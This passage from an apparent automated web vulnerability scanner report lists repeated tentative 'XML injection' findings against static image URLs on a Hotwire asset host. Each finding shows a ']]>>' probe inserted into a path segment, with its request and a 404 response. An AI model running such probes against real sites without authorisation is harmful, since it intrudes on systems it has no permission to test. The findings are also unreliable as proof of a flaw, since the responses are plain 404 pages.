Path:   /static/images/hotel/details/img-gradient-opaque-price-info-module.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details]]>>/img-gradient-opaque-price-info-module.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:08 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.136. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-gradient-opaque-price-info-module.png [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-gradient-opaque-price-info-module.png

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/img-gradient-opaque-price-info-module.png]]>>?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:12 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.137. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/hotel/details/img-opaque-price-lockup-bg-new-large.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:57 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.138. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/hotel/details/img-opaque-price-lockup-bg-new-large.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535991
Date: Mon, 03 Oct 2011 01:02:00 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.139. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel]]>>/details/img-opaque-price-lockup-bg-new-large.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:04 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.140. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details]]>>/img-opaque-price-lockup-bg-new-large.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:08 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.141. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png]]>>?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:12 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.142. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:57 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.143. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:59 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.144. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel]]>>/details/img-opaque-price-lockup-bg-new-large_cap.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.145. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details]]>>/img-opaque-price-lockup-bg-new-large_cap.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:08 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.146. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png]]>>?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:11 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.147. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-retail-tabs-on.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-retail-tabs-on.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/hotel/details/img-retail-tabs-on.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:23 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.148. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-retail-tabs-on.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-retail-tabs-on.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/hotel/details/img-retail-tabs-on.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:27 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.149. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-retail-tabs-on.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-retail-tabs-on.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel]]>>/details/img-retail-tabs-on.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:31 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.150. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-retail-tabs-on.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-retail-tabs-on.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details]]>>/img-retail-tabs-on.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:35 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.151. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-retail-tabs-on.png [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-retail-tabs-on.png

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/img-retail-tabs-on.png]]>>?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Expires: Mon, 03 Oct 2011 01:02:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
